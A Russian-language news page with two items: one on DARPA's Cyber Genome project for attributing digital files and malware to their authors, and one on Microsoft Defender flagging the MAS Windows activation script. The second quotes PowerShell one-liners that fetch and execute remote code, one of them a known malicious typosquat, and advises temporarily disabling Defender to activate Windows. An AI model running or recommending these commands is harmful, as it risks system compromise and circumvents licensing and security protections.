DARPA запустила проект Cyber Genome

DARPA запустила проект Cyber Genome

...

Агентство перспективных оборонных разработок DARPA (США) начало работу над проектом Cyber Genome, в рамках которого планируется создать уникальный набор аналитических инструментов. Эти инструменты позволят определить первоисточник любого электронного материала, будь то текстовый документ или фрагмент компьютерного вируса.

Формально программой Cyber Genome предполагается сбор данных из самых разных систем, в том числе из традиционных компьютеров, КПК и/или распределенных информационных систем, из проводных и беспроводных сетей, а также с любых носителей. Собранные данные будут анализироваться по таким же схемам, как геном человека. Конечная цель проекта – связать любой цифровой "артефакт" с его автором. Иначе говоря, спецслужбы США должны получить возможность находить автора любого файла с помощью тех же алгоритмов и методик, которые используются для определения подозреваемых по фрагментам тканей, оставленных на месте преступления.

Таким образом, в будущем любой фрагмент программного кода или любой созданный вами документ в конце концов можно будет отследить и доказать, что их создали именно вы. Также может появиться инструмент для определения маршрута ваших творений – каким путем они попали в то место, где их обнаружили.

Отмечается, что в проекте Cyber Genome могут принимать участие только граждане США. Следовательно, остальной мир не сможет узнать о развитии программы, пока она не начнет давать первые результаты.

источник

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru